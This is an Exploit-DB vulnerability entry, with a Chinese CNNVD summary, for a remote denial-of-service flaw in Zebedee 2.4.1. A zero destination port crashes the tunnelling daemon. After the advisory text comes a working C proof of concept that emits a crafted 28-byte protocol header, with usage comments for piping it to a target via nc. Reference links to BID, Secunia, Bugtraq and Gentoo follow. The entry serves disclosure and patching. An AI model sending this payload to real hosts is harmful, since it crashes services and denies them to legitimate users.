https://www.exploit-db.com/exploits/26249
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-114

Zebedee是一个简单的工具软件，它可以为两个系统间建立一个加密、压缩的TCP/IP，UDP通道。Zebedee2.4.1当未设置”允许重定向端口”时，远程攻击者可以通过协议选项头的端口编号包含的零来引起拒绝服务(应用程序崩溃)攻击，从而触发zebedee.c的makeConnection函数的声明错误。

source: http://www.securityfocus.com/bid/14796/info

A remote denial of service vulnerability affects Zebedee. This issue is due to a failure of the application to properly handle exceptional network requests.

Specifically, Zebedee is unable to handle requests for connections that contain a zero for the requested destination port.

A remote attacker may leverage this issue to crash the affected application, denying service to legitimate users.

Zebedee version 2.4.1 is reported vulnerable to this issue; other versions may also be affected.

/*
        $ gcc -o mkZebedeeDoS mkZebedeeDoS.c
        $ ./mkZebedeeDoS > zebedeeDoS
        $ nc targethost port < zebedeeDoS
*/

#include <stdio.h>

int main (int argc, char **argv)
{

        int i, size;

        char data[] = {
        0x02, 0x01, // protocol version
        0x00, 0x00, // flags
        0x20, 0x00, // max message size
        0x00, 0x06, // compression info
        0x00, 0x00, // port request: value = 0x0
        0x00, 0x80, // key length
        0xff, 0xff, 0xff, 0xff, // key token
        0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
        0x00, 0x00, 0x00, 0x00 // target host address
         };

        size = 28;
        for(i=0; i<size; i++){
                printf("%c", data[i]);
        }

        return 0;

}

来源:BID
名称:14796
链接:http://www.securityfocus.com/bid/14796
来源:SECUNIA
名称:16788
链接:http://secunia.com/advisories/16788/
来源:BUGTRAQ
名称:20050909ZebedeeDoSVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112629543605488&w;=2
来源:GENTOO
名称:GLSA-200509-14
链接:http://www.gentoo.org/security/en/glsa/glsa-200509-14.xml